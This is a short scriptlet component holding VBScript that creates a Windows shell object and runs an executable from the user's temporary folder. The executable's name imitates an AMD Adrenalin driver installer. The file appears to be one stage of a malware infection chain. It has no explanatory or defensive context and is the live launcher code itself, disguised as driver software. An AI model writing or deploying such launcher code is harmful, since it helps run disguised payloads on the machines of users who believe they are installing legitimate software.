<component>
<script language="VBScript">
Set shell=CreateObject("wscript.shell")
shell.Run(shell.ExpandEnvironmentStrings("%TEMP%") & "\amd-software-adrenalin-edition-24.5.2.exe")
</script>
</component>
